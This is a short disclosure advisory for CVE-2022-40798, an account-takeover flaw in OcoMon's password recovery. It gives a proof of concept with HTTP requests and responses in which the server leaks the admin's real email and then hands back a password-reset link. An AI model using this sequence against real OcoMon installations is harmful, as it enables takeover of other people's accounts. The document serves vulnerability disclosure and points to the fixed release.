CVE-2022-40798: CVE-2022-40798 - OcoMon Account Takeover

Description

Through password recovery its possible to obtain a token to reset password of any user.

Bug - 1

The vulnerability occurs because the application validates the email in database and returns the real email to the user.

Bug - 2

If username and email are valid, the application returns to user the link to reset the password instead of sending it by email.

PoC

• Access "Esqueci minha senha:

• Enter a valid username (example: admin) and a fake email.

• The user’s real email will be exposed in the response:

• Send the request again replacing the fake email to user original email:

• In the request response have the link to change the user’s password, just access and change:

Examples:

URL: https://ocomon.site/includes/common/require_access_recovery_process.php

DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&[email protected]&action=require_recovery

RESPONSE: "action":"require_recovery","field_id":"email","login_name":"admin","email":"[email protected]","user_id":"1","name":"Administrador do Sistema","mail_to":"[email protected]"}


URL: https://ocomon.site/includes/common/require_access_recovery_process.php
 
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&[email protected]&action=require_recovery
 
RESPONSE: "action":"require_recovery","field_id":"","login_name":"admin","email":"[email protected]","user_id":"1","name":"Administrador do Sistema","mail_to":"[email protected]","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}

FIX

https://ocomonphp.sourceforge.io/downloads/